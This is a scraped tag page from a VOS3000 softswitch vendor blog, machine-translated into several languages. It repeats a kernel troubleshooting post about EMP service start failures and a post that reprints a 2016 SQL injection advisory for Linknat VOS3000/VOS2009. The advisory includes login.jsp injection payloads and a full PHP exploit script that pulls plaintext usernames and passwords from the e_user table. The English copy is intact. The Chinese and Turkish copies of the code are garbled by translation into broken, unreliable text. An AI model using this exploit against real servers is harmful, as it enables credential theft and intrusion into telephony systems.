Skip to content
  • Home
  • Cheapest VOS3000 Server Rent, VOS3000 Best Trusted Vendor
  • VOS3000 Softswitch
Search
Close

VOS3000

MULTAHOST Blog for VOS3000 Troubleshoot

Tag: VOS3000 Admin Interface

multahost-vos3000-server-banner, VOS3000 2.1.8.00, VOS3000 All PDF Manuals, VOS3000 client, Vendor Billing

EMP Start VOS3000 Server SSH başarısız, nasıl çözmek için?

June 7, 2019January 15, 2026 king

EMP Start VOS3000 Server SSH başarısız, nasıl çözmek için?

Merhaba Tüm,

# hizmet empd başlangıç
Kunshi emp hizmetinin başlatılması: [FAILED]

Birçoğunuz EMP komutu verdikten sonra başarısız sorunu emp start yüz, Birçok nedeni vardır, şimdi önemli bir konu açıklayacağız. VOS3000 Emp, Linux’un tüm çekirdek sürümlerini desteklemez. Çoğunlukla VOS3000 için kullanılan işletim sistemi CentOS, Centos 5.11 artık centos tarafından desteklenen, bu yüzden herhangi bir veri merkezi ama mümkün onu almak zor. Bu durumda Repo dosyasını düzeltmem gerekiyor. Ayrıca Centos 6.10 veya Centos 7 de VOS3000 birçok sürümü desteklenmedi. Esas olarak emp çekirdek sorunu nedeniyle başlamaz. emp başlangıç olmadan MBX başlatamaz. Bu durumda desteklenen çekirdek için Çekirdek düşürmek zorunda veya desteklenen bir çekirdek yükseltmeniz gerekir. Ben ekli dosyada burada emp desteklenen çekirdek listesini paylaşıyorum. Böylece kolayca yükseltebilir ve düşürebilirsiniz.

Yükseltme veya google’da arayabilirsiniz Çekirdek sürümü düşürmek için, bunun için çok kolay bir kılavuz vardır.

emp desteklenen çekirdek listesi

Vos3000 ile çekirdek sorunu için bilmeniz gereken bazı önemli komutlar.

Yüklü yazılımı listelemek için standart rpm komutunu kullanmanız gerekir. Shell komut u komutuna aşağıdaki komutu yazın:


$ rpm -qa çekird
ekOutput: çekirdek-2.6.18-4.1.15.el5 çekirdek-2.6.18-8.1.14.el5 k ernel-2.6.18-8.1.10.el5

Daha fazla yardıma ihtiyacınız varsa sadece whatsapp beni: +8801911119966


VOS3000 Softswitch VoIP – Guía Técnica Completa (Instalación, Servidor y Precio)


  • Configuración servidor LRN VOS3000 Reliable parámetros SS_LRN_SERVER_IP PORT
  • Portabilidad numérica LRN VOS3000 Proven consulta de carriers EE.UU.
  • Precisión decimal tarifas VOS3000 Accurate configuración FEE_PRECISTION y HOLD_TIME_PRECISION
  • Códigos respuesta SIP CDR VOS3000 Complete Important referencia de 30+ códigos
  • Reemplazo razón fallida VOS3000 Best Strategic configuración personalizada de errores
multahost-vos3000-server-banner, VOS3000 2.1.8.00, VOS3000 All PDF Manuals, VOS3000 client, Vendor Billing

Emp Start a échoué dans VOS3000 Server SSH, Comment résoudre ?

June 7, 2019January 17, 2026 king

Emp Start a échoué dans VOS3000 Server SSH, Comment résoudre ?

Bonjour à tous,

# service empd démarrer
Démarrage du service kunshi emp : [FAILED]

Beaucoup d’entre vous face problème EMP Start Échoué après avoir donné la commande pour EMP, Il ya beaucoup de raisons, je vais décrire maintenant un problème majeur. VOS3000 Emp ne prenezs pas toutes les versions de noyau de Linux. Os principalement utilisé pour VOS3000 est CentOS, Centos 5.11 n’est plus pris en charge par centos, de sorte que son difficile de l’obtenir à partir de n’importe quel centre de données, mais possible. Besoin de fixer le fichier Repo dans ce cas. Centos 6.10 ou Centos 7 n’ont pas non plus pris en charge de nombreuses versions de VOS3000. Principalement emp pas commencer en raison de problème de noyau. sans emp démarrer, vous ne pouvez pas démarrer MBX. Dans ce cas, vous devez déclasser Kernel vers le noyau pris en charge ou devez mettre à niveau le noyau vers un pris en charge. Je partage emp pris en charge liste de noyau ici dans le fichier joint. Ainsi, vous pouvez mettre à niveau et déclasser facilement.

Pour mettre à niveau ou déclasser la version Kernel, vous pouvez rechercher dans Google, il ya beaucoup de manuel facile pour cela.

liste de noyau prise en charge

Quelques commandes importantes que vous devez connaître pour problème de noyau avec vos3000.

Vous devez utiliser la commande rpm standard pour répertorier les logiciels installés. Tapez la commande suivante à l’invite d’obus :


$ rpm -qa kernel
Output: kernel-2.6.18-4.1.15.el5 kernel-2.6.18-8.1.14.el5 k ernel-2.6.18-8.1.10.el5

Si vous avez besoin de plus d’aide juste whatsapp moi: +8801911119966


  • Configuración servidor LRN VOS3000 Reliable parámetros SS_LRN_SERVER_IP PORT
  • Portabilidad numérica LRN VOS3000 Proven consulta de carriers EE.UU.
  • Precisión decimal tarifas VOS3000 Accurate configuración FEE_PRECISTION y HOLD_TIME_PRECISION
  • Códigos respuesta SIP CDR VOS3000 Complete Important referencia de 30+ códigos
  • Reemplazo razón fallida VOS3000 Best Strategic configuración personalizada de errores
multahost-vos3000-server-banner, VOS3000 2.1.8.00, VOS3000 All PDF Manuals, VOS3000 client, Vendor Billing

Error de inicio de EMP en VOS3000 Server SSH, ¿Cómo resolver?

June 7, 2019March 18, 2026 king

Error de inicio de EMP en VOS3000 Server SSH, ¿Cómo resolver?

Hola a todos,

• inicio del servicio e
mpd Inicio del servicio kunshi emp: [FAILED]

Muchos de ustedes se enfrentan a problema EMP Inicio fallado después de dar el comando para EMP, Hay muchas razones, voy a describir ahora un problema importante. VOS3000 Emp no es compatible con todas las versiones del kernel de Linux. El sistema operativo utilizado principalmente para VOS3000 es CentOS, Centos 5.11 ya no es compatible con centos, por lo que es difícil obtenerlo de cualquier centro de datos, pero es posible. Necesito arreglar el archivo Repo en ese caso. También Centos 6.10 o Centos 7 tampoco soportan muchas versiones de VOS3000. Principalmente emp no iniciar debido a la problema del kernel. sin emp start no se puede iniciar MBX. En ese caso, debe degradar kernel al kernel soportado o necesita actualizar el kernel a uno compatible. Estoy compartiendo la lista del kernel soportado emp aquí en el archivo adjunto. Así que usted puede actualizar y degradar fácilmente.

Para actualizar o degradar la versión del núcleo se puede buscar en google, hay muchos manuales fáciles para eso.

lista de kernels soportados emp

Algunos comandos importantes que necesita saber para el problema del kernel con vos3000.

Usted necesita utilizar el comando estándar rpm para enumerar el software instalado. Escriba el siguiente comando en el símbolo del sistema del shell:


$ rpm -qa kernel
Output: kernel-2.6.18-4.1.15.el5 kernel-2.6.18-8.1.14.el5 k ernel-2.6.18-8.1.10.el5

Si necesitas más ayuda sólo whatsapp me: +8801911119966


VOS3000 Price & Rent – Installation Cost, Server Plans and Pricing Guide

VOS3000 Download & Manual – Official Clients, Documentation and Guides

  • Configuración servidor LRN VOS3000 Reliable parámetros SS_LRN_SERVER_IP PORT
  • Portabilidad numérica LRN VOS3000 Proven consulta de carriers EE.UU.
  • Precisión decimal tarifas VOS3000 Accurate configuración FEE_PRECISTION y HOLD_TIME_PRECISION
  • Códigos respuesta SIP CDR VOS3000 Complete Important referencia de 30+ códigos
  • Reemplazo razón fallida VOS3000 Best Strategic configuración personalizada de errores

EMP শুরু VOS3000 সার্ভার SSH-এ ব্যর্থ হয়েছে, কিভাবে সমাধান করতে হবে?

June 7, 2019 king

হ্যালো অল,

# সার্ভিস empd শুরু
কুনশি ইএমপি সেবা শুরু হচ্ছে: [FAILED]

আপনারা অনেকেই ইএমপি-র জন্য আদেশ দেওয়ার পর ইএমপি স্টার্ট ব্যর্থ হয়েছেন, অনেক কারণ আছে, আমি এখন একটি প্রধান বিষয় বর্ণনা করব। VOS3000 Emp লিনাক্সের সকল কার্নেল সংস্করণ সমর্থন করে না। VOS3000 এর জন্য বেশিরভাগ ব্যবহৃত ওএস সেন্টওএস, সেন্টোস 5.11 আর সেন্টোস দ্বারা সমর্থিত নয়, তাই এটি যে কোন ডাটাসেন্টার থেকে পাওয়া কঠিন কিন্তু সম্ভব। সেক্ষেত্রে রেপো ফাইল ঠিক করতে হবে। এছাড়াও সেন্টোস 6.10 বা সেন্টোস 7 এছাড়াও VOS3000 এর অনেক সংস্করণ সমর্থন করেনি। প্রধানত কার্নেল সমস্যার কারণে ইএমপি শুরু হয় না। EMP শুরু ছাড়া আপনি MBX শুরু করতে পারবেন না। সেক্ষেত্রে আপনাকে কার্নেলকে সমর্থিত কার্নেলে নামিয়ে আনতে হবে অথবা সমর্থিত কার্নেল আপগ্রেড করতে হবে। আমি সংযুক্ত ফাইলে EMP সমর্থিত কার্নেল তালিকা এখানে শেয়ার করছি। যাতে আপনি সহজেই আপগ্রেড এবং ডাউনডাউন করতে পারেন।

কার্নেল সংস্করণ আপগ্রেড বা ডাউনগ্রেড করার জন্য আপনি Google এ অনুসন্ধান করতে পারেন, এর জন্য অনেক সহজ ম্যানুয়াল আছে.

EMP সমর্থিত কার্নেল তালিকা

কিছু গুরুত্বপূর্ণ কমান্ড আপনার জানা প্রয়োজন ভোস3000 সঙ্গে কার্নেল ইস্যু জন্য.

ইনস্টল করা সফটওয়্যারতালিকাভুক্ত করতে আপনাকে আদর্শ RPM কমান্ড ব্যবহার করতে হবে। শেল প্রম্পটে নিম্নলিখিত কমান্ড টাইপ করুন:


$ rpm -qa কার্নে
ল আউটপুট: kernel-2.6.18-4.1.15.el5 কার্নেল-2.6.18-8.1.1.el5 k ernel-2.6.18-8.1.10.el5

আপনার যদি আরো সাহায্যের প্রয়োজন হয় তাহলে আমাকে হোয়াটসঅ্যাপ করুন: +৮৮০১৯১১১১৯৯৬৬

فشل EMP ابدأ في خادم VOS3000 SSH، كيفية حل؟

June 7, 2019 king

مرحبا بالجميع ،

# خدمة empd بد
ء بدء خدمة كونشي EMP: [FAILED]

العديد منكم مواجهة قضية EMP ابدأ فشل بعد إعطاء الأمر ل EMP، وهناك سبب كثير، وسوف أصف الآن قضية رئيسية واحدة. VOS3000 لا تدعم EMP جميع إصدارات نواة لينكس. نظام التشغيل المستخدمة في الغالب لVOS3000 هو CentOS، سنتوس 5.11 لم يعد مدعوما من قبل سنتوس، لذلك من الصعب الحصول عليه من أي مركز بيانات ولكن ممكن. تحتاج إلى إصلاح ريبو الملف في هذه الحالة. أيضا سنتاوس 6.10 أو Centos 7 أيضا لا تدعم العديد من الإصدارات من VOS3000. أساسا لا تبدأ emp بسبب مشكلة النواة. دون بدء EMP لا يمكنك بدء MBX. في هذه الحالة لديك لخفض النواة إلى نواة معتمدة أو الحاجة إلى ترقية نواة لدعم واحد. أنا تقاسم EMP قائمة نواة معتمدة هنا في الملف المرفق. حتى تتمكن من الترقية وتقلل بسهولة.

للترقية أو إصدار إصدار Kernel يمكنك البحث في جوجل ، هناك العديد من دليل سهل لذلك.

emp قائمة kernel معتمدة

بعض الأوامر الهامة التي تحتاج إلى معرفتها عن مشكلة النواة مع vos3000.

تحتاج إلى استخدام الأمر دورة في الدقيقة القياسية لقائمة البرامج المثبتة. اكتب الأمر التالي في موجه shell:


$ دورة في الدقيقة
– qa kernelOutput: نواة-2.6.18-4.1.15.el5 نواة 2.6.18-8.1.14.el5 k ernel-2.6.18-8.1.10.el5

إذا كنت بحاجة إلى مزيد من المساعدة فقط ال whatsapp لي: +880191119966

multahost-vos3000-server-banner, VOS3000 2.1.8.00, VOS3000 All PDF Manuals, VOS3000 client, Vendor Billing

EMP 启动失败在 VOS3000 服务器 SSH,如何解决 ?

June 7, 2019January 16, 2026 king

EMP 启动失败在 VOS3000 服务器 SSH,如何解决 ?

大家好,

* 服务 empd 启动
启动 kunshi emp 服务: [FAILED]

你们许多人在给出EMP命令后面临EMP启动失败的问题,有很多原因,我现在将描述一个主要问题。 VOS3000 Emp 不支持 Linux 的所有内核版本。 VOS3000 主要用于的 OS 是 CentOS,Centos 5.11 不再受 centos 支持,因此很难从任何数据中心获取,但可能。 在这种情况下, 需要修复存储库文件。 此外, Centos 6.10 或 Centos 7 也不支持 VOS3000 的许多版本。 主要是 emp 由于内核问题而未启动。没有 emp 启动, 你不能启动 Mbx 。 在这种情况下,您必须将内核降级为受支持的内核,或者需要将内核升级到受支持的内核。 我在附加文件中共享 emp 支持的内核列表。 因此,您可以轻松升级和降级。

对于升级或降级内核版本,你可以在谷歌搜索,有很多简单的手册。

emp 支持的内核列表

对于 vos3000 的内核问题,您需要了解一些重要的命令。

您需要使用标准 rpm 命令列出已安装的软件。 在 shell 提示符下键入以下命令:


$ rpm - qa 内核输
出: 内核 – 2.6.18 – 4.15. el5 内核 – 2.6.18 – 8.14.el5 k ernel-2.6.18-8.1.10.el5

如果你需要更多的帮助, 只是什么应用程序我: +880191119966

  • Configuración servidor LRN VOS3000 Reliable parámetros SS_LRN_SERVER_IP PORT
  • Portabilidad numérica LRN VOS3000 Proven consulta de carriers EE.UU.
  • Precisión decimal tarifas VOS3000 Accurate configuración FEE_PRECISTION y HOLD_TIME_PRECISION
  • Códigos respuesta SIP CDR VOS3000 Complete Important referencia de 30+ códigos
  • Reemplazo razón fallida VOS3000 Best Strategic configuración personalizada de errores

VoS3000 如何被黑客攻击的 SQL 注入脚本, 防止黑客攻击!

June 4, 2019November 22, 2020 king

林克纳特VOS2009/VOS3000 SQL 注入


从: 奥萨马· <osama ()="" codinghazard="" com="">哈立德 日
期: 2016年5月19日 星期四 16:52:54 +0500</osama>


在 Linknat VOS3000/VOS2009 中发现了 SQL 注入,这是一种流行的 VoIP
软开关,可以允许远程攻击者访问
以纯文本存储的凭据。

应用: Linknat VOS3000/VOS2009
受影响的版本: 2.1.1.5, 2.1.1.8, 2.1.2.0
供应商 URL: http://www.linknat.com/
错误: SqLi (具有 DBA 特权)
类型:远程
分辨率:已修复,升级到 2.1.2.4 或 2.1.6.0 清洁版本
型号: 吴云-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

SQLi 报告是基于时间的盲人。 因为它不是带内SQLi,
结果可以从欢迎的输出中收集.jsp期间
会话。

(第一次请求)

邮政http://target/eng/login.jsp
PARAM 登录类型=1
        名称=' 联合选择 1,2,@@version",'你好',5,6#
        通过'或'''''

(同一会话期间的第二个请求)

获取http://target/eng/welcome.jsp
结果 0=' 联合选择
1,2,@@version,"你好",5,6#1=5.0.51a社区[hello{0.00]0.00]

<?php
#
# Linknat VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The [ EXPLOIT CODE ]exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one   = isset($argv) ? $argv :[1] "loginname";
$column_two  [2] = isset[2]($argv) ? $argv : "password";
$table     [3]   = iss[3]et($argv) ? $argv : "e_user";
$other   [4]     = is[4]set($argv) ? $argv : "";

function ba[5]nner() {[5]
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php[HOST] n";
    echo "php vos3000.php 127.0.0.1n";
    echo "php vos300[HOST]0[COL1].[COL2]p[TABLE]h[OTHER SQL]p     n";
    echo "php vos3000.php 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) |
        foreach ($po[]st为 $key [> $value)
            $post_项目 = $key 。'=' .urlencode ($value);
        $post_string = 内爆('&',$post_项);
        curl_setopt($curl,CURLOPT_POST,1);
        curl_setopt($curl,CURLOPT_POSTFIELDS,$post_string);
    }
    $data = curl_exec($curl);
    curl_close($curl);
    返回$data;
}

函数查询($host$query) |
    $data = 卷曲("http://$host/eng/登录.jsp";, 数组(
            "登录类型"=> 1,
            "名称"=>"联盟"。$query."#",
            "通过" > "或"""""""""""""""""""""""""""""""""""""""""
        ),空,真);
    preg_match_all('|设置曲奇: (.*$matches $data);
    $cooki[1]es = 内爆 (';",$matches);
    $data = 卷曲("http://$host/eng/欢迎.jsp";, 数组 (), $cookies, 假);
    $parts = 爆炸("=",修剪($data);

如果 (计数($parts) < 7)
        return false;

    return array($[3]parts, [4]$parts);
}

function ascii_table($data) {
    $keys = array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $[$k]v)
       [$k]     $wid = 最大值($wid,条纹($v);
    }
    前 ($wid作为$k [> $v)]
  [$k]      $fmt = "%-[$v]";
 [$k]       $sep = str_repeat ('-', $v);
    }
    $fmt "' .内爆(')', $fmt) 。' |';
    $sep = "=-" 。爆裂('-=-',$sep)。'-+';
    $buf = 数组($sep,vsprintf($fmt,$keys),$sep);
    每一$data ($row) |
        $buf = vsprin[]tf($fmt,$row);
        $buf = $sep;[]
    }
    返回内爆("n",$buf);
}

横幅();
回音"n";
回音"目标:$hostn";
回音"列#1:$column_onen";
回音"列#2:$column_2n";
回音"表:$tablen";
回音"其他:$othern";
回音"n";

$results = 数组();
$count_result = 查询($host,"选择 1,2,COUNT(*),4,5,6 $table
$other");
如果 ($count_结果) |
    $count = intval($count_结果);
    回音"$count行...n";

用于 ($i=0;$i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($col[0]umn_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column_two="" .="" "=" . hex2bin($result) [0].
" n";="" }="" else="" {="" echo="" "error=[1]"" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_one" =="">十六进制 ($[]result), $column_2
•>十六进制($result);使[0]用十进制十六进制($result));$result十六进制"[1];$result十六进制";$result
    }

如果 (计数 ($results) > 0) |
        回显"nn"。ascii_table($results) ."n";
    }
[否则]
    回显"错误检索行计数";
}

?></$count;>

从 2016 年人们使用一些 sql 注入软产品来破解 VOS3000, 我们有自己的安全系统, 从那个时候开始, 我们更新我们的安全系统太强了, 我的工作重点总是为 voip 软切换的安全. 大多数时候,我给免费的建议或共享信息尽可能免费。 仍然有很多脏东西跑来跑去, 所以请永远小心, 知道更多。 否则,你永远无法做好生意。 现在一天人们使用在VOS3000客户端软件中隐藏的脚本或恶意软件来破解VOS服务器。

更多帮助敲我在 whatsapp: +880191119966 – 我会做帮助所有的方式。

HOW VOS3000 Get Hacked by SQL Injection Script, prevent Hacking!

June 4, 2019March 10, 2026 king1 Comment

Linknat VOS2009/VOS3000 SQL injection


From: Osama Khalid <osama () codinghazard com>
Date: Thu, 19 May 2016 16:52:54 +0500


A SQL injection was found in Linknat VOS3000/VOS2009, a popular VoIP
softswitch, that could allow remote attackers to gain access to the
credentials stored in plain-text.

Application: Linknat VOS3000/VOS2009
Versions Affected: 2.1.1.5, 2.1.1.8, 2.1.2.0
Vendor URL: http://www.linknat.com/
Bug: SQLi (with DBA privileges)
Type: Remote
Resolution: Fixed, upgrade to 2.1.2.4 or 2.1.6.0 Clean Version
Reference: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

The SQLi reported is time-based blind. Since it is not an in-band SQLi, the
results can be gathered from the output of welcome.jsp during the same
session.

(1st request)

POST    http://target/eng/login.jsp
PARAM   loginType=1
        name=' union select 1,2,@@version,'hello',5,6#
        pass=' OR ''='

(2nd request during the same session)

GET     http://target/eng/welcome.jsp
RESULT  0|' union select
1,2,@@version,'hello',5,6#|1|5.0.51a-community|hello|0.00|0.00|

[ EXPLOIT CODE ]

<?php
#
# Linknat VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv[1];
$column_one   = isset($argv[2]) ? $argv[2] : "loginname";
$column_two   = isset($argv[3]) ? $argv[3] : "password";
$table        = isset($argv[4]) ? $argv[4] : "e_user";
$other        = isset($argv[5]) ? $argv[5] : "";

function banner() {
    echo "########################################\n";
    echo "#                                      #\n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #\n";
    echo "#                                      #\n";
    echo "#             Osama Khalid             #\n";
    echo "########### codinghazard.com ###########\n";
}

function usage() {
    echo "\n";
    echo "php vos3000.php [HOST]\n";
    echo "php vos3000.php 127.0.0.1\n";
    echo "php vos3000.php [HOST] [COL1] [COL2] [TABLE] [OTHER SQL]\n";
    echo "php vos3000.php 127.0.0.1 table_schema table_name
information_schema.tables \"where table_schema = 'mysql'\"
\n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {
        foreach ( $post as $key => $value)
            $post_items[] = $key . '=' . urlencode($value);
        $post_string = implode('&', $post_items);
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);
    }
    $data = curl_exec($curl);
    curl_close($curl);
    return $data;
}

function query($host, $query) {
    $data = curl("http://$host/eng/login.jsp";, array(
            "loginType" => 1,
            "name" => "' union " . $query . "#",
            "pass" => "' OR ''='"
        ), null, true);
    preg_match_all('|Set-Cookie: (.*);|U', $data, $matches);
    $cookies = implode('; ', $matches[1]);
    $data = curl("http://$host/eng/welcome.jsp";, array(), $cookies, false);
    $parts = explode("|", trim($data));

    if (count($parts) < 7)
        return false;

    return array($parts[3], $parts[4]);
}

function ascii_table($data) {
    $keys = array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid[$k] = max($wid[$k], strlen($v));
    }
    foreach($wid as $k => $v) {
        $fmt[$k] = "%-{$v}s";
        $sep[$k] = str_repeat('-', $v);
    }
    $fmt = '| ' . implode(' | ', $fmt) . ' |';
    $sep = '+-' . implode('-+-', $sep) . '-+';
    $buf = array($sep, vsprintf($fmt, $keys), $sep);
    foreach($data as $row) {
        $buf[] = vsprintf($fmt, $row);
        $buf[] = $sep;
    }
    return implode("\n", $buf);
}

banner();
echo "\n";
echo "Target:    $host\n";
echo "Column #1: $column_one\n";
echo "Column #2: $column_two\n";
echo "Table:     $table\n";
echo "Other:     $other\n";
echo "\n";

$results = array();
$count_result = query($host, "SELECT 1,2,COUNT(*),4,5,6 FROM $table
$other");
if ($count_result) {
    $count = intval($count_result[0]);
    echo "Found $count rows...\n";

    for ($i=0; $i<$count; $i++) {
        $q = "SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " . $i . ",1";
        $result = query($host, $q);
        if ($result) {
            echo "R" . ($i+1) . "]\t" . $column_one . " = " .
hex2bin($result[0]) . ", " . $column_two . " = " . hex2bin($result[1]) .
"\n";
        } else {
            echo "Error retrieving row " . ($i+1) . "\n";
        }
        $results[] = array($column_one => hex2bin($result[0]), $column_two
=> hex2bin($result[1]));
    }

    if (count($results) > 0) {
        echo "\n\n" . ascii_table($results) . "\n";
    }
} else {
    echo "Error retrieving row count";
}

?>

From 2016 People using some sql injection soft wares to hack VOS3000, We have our own security system from that time, we updated our security system too strong now, my work focus was always for security for voip soft-switch. Most of the time i gave free advice or shared information as much possible free of cost. Still there are lots of dirty things running around, so please be careful always and know more. Otherwise you will never able to do good business ever. Now-a-days People using hidden scripts or malwares in VOS3000 Client software to hack VOS Server.

For More Help Knock me in whatsapp: +8801911119966 – i will do help all the ways.

Nasıl VOS3000 SQL Injection Script tarafından Hacked alın, Hacking önlemek!

June 4, 2019November 22, 2020 king

Linknat VOS2009/VOS3000 SQL enjeksiyon


Gönderen: Usame Khalid <osama ()="" codinghazard="" com="">T
arih: Perşembe 19 May 2016 16:52:54 +0500</osama>


Bir SQL enjeksiyon Linknat VOS3000/VOS2009, popüler bir VoIP bulundu
softswitch, uzak saldırganların erişim elde etmek için izin verebilir
düz metinde depolanan kimlik bilgileri.

Uygulama: Linknat VOS3000/VOS2009
Etkilenen Sürümler: 2.1.1.5, 2.1.1.8, 2.1.2.0
Satıcı URL'si: http://www.linknat.com/
Hata: SQLi (DBA ayrıcalıkları ile)
Türü: Uzaktan Kumanda
Çözünürlük: Düzeltildi, 2.1.2.4 veya 2.1.6.0 Temiz Sürüm'e yükseltin
Referans: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

SQLi rapor zaman tabanlı kör olduğunu bildirdi. Bir grup SQLi olmadığından,
sonuçlar hoş geldin çıktısından toplanabilir.jsp sırasında
Oturum.

(1. istek)

http://target/eng/login.jsp sonrası
PARAM girişTürü=1
        isim=' sendika seç 1,2,@@version,'hello',5,6#
        pass=' OR ''='

(Aynı oturumda 2. istek)

GET http://target/eng/welcome.jsp
SONUÇ 0|' sendika seçimi
1,2,@@version,'hello',5,6#|1|5.0.51a-community|hello|0.00|0.00|

<?php
#
# Linknat VOS2009[ EXPLOIT CODE ]/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one   = isset($argv)[1] ? $argv : "loginname";
$colum[2]n_two   =[2] isset($argv) ? $argv : "password";
$table [3]       = [3]isset($argv) ? $argv : "e_user";
$other    [4]    = iss[4]et($argv) ? $argv : "";

function banner[5]() {
    [5]echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos3000.php 127.0[HOST].0.1n";
    echo "php vos3000.php     n";
    echo "php vos3000.php 12[HOST]7[COL1].[COL2]0[TABLE].[OTHER SQL]0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {
        foreach ( $key olarak $post => $value)
            $post_öğeleri = $key . '=' . urlencode($value);
 []       $post_string = implode('&', $post_items);
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);
    }
    $data = curl_exec($curl);
    curl_close($curl);
    $data geri dönmek;
}

fonksiyon sorgusu($host, $query) {
    $data = curl("http://$host/eng/login.jsp";, dizi(
            "loginType" => 1,
            "isim" => "' birliği " . $query . "#",
            "pass" => "' VEYA ''='"
        ), null, doğru);
    preg_match_all('| Set-Çerez: (.*);|U', $data, $matches);
    $cookies = implode('; ', $matches);
    $data = curl("http://$h[1]ost/eng/welcome.jsp";, array(), $cookies, false);
    $parts = patlayabilir("|", trim($data));

if (count($parts) < 7)
        return false;

    return array($parts, $parts);
}

function ascii_t[3]able($da[4]ta) {
    $keys = array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid = max($wid, strlen($v));
    }
[$k]    foreach[$k]($k => $v olarak $wid) {
        $fmt = "%-{$v}s";
        $sep = [$k]str_repeat('-', $v);
    }[$k]
    $fmt = '| ' . implode(' | ', $fmt) . ' |';
    $sep = '+-' . implode('-+-', $sep) . '-+';
    $buf = array($sep, vsprintf($fmt, $keys), $sep);
    foreach($row olarak $data) {
        $buf = vsprintf($fmt, $row);
  []      $buf = $sep;
    }
    dönüş imp[]lode("n", $buf);
}

afiş();
yankı "n";
yankı "Hedef: $hostn";
yankı "Sütun #1: $column_onen";
yankı "Sütun #2: $column_twon";
yankı "Tablo: $tablen";
yankı "Diğer: $othern";
yankı "n";

$results = dizi();
$count_result = query($host, "SELECT 1,2,COUNT(*),4,5,6 FROM $table
$other");
if ($count_sonuç) {
    $count = intval($count_result);
    yankı "Bulunan $count satırları...n[0]";

için ($i=0; $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $co[0]lumn_two="" .="" "=" . hex2bin($result) .
" n";[1]="" }="" else="" {="" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="ar[]ray($column_one" ==""> hex2bin($result),[0] $column_two
=> hex2bin($result))[1];
    }

if (count($results) > 0) {
        yankı "nn" . ascii_table($results) . "n";
    }
} else {
    yankı "Hata alma satır sayısı";
}

?></$count;>

